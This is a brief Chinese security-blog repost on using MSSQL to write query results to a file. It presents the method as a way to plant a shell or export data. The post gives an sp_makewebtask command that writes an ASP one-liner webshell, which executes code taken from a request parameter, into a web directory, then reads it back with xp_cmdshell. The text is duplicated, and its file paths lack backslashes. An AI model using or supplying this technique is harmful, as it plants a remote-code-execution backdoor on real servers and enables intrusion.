- A+
所属分类:安全文章
当做另一种写shell的方式,或者导出数据的方法吧。
exec sp_makewebtask 'c:wwwtestwri.asp','select''<%execute(request("SB"))%>'' '
exec master..xp_cmdshell 'type c:wwwtestwri.asp'
分享、点赞、在看就是对我们的一种支持!
本文始发于微信公众号(ChaBug):MSSQL把查询的东西写到文件中
当做另一种写shell的方式,或者导出数据的方法吧。
exec sp_makewebtask 'c:wwwtestwri.asp','select''<%execute(request("SB"))%>'' '
exec master..xp_cmdshell 'type c:wwwtestwri.asp'
分享、点赞、在看就是对我们的一种支持!
本文始发于微信公众号(ChaBug):MSSQL把查询的东西写到文件中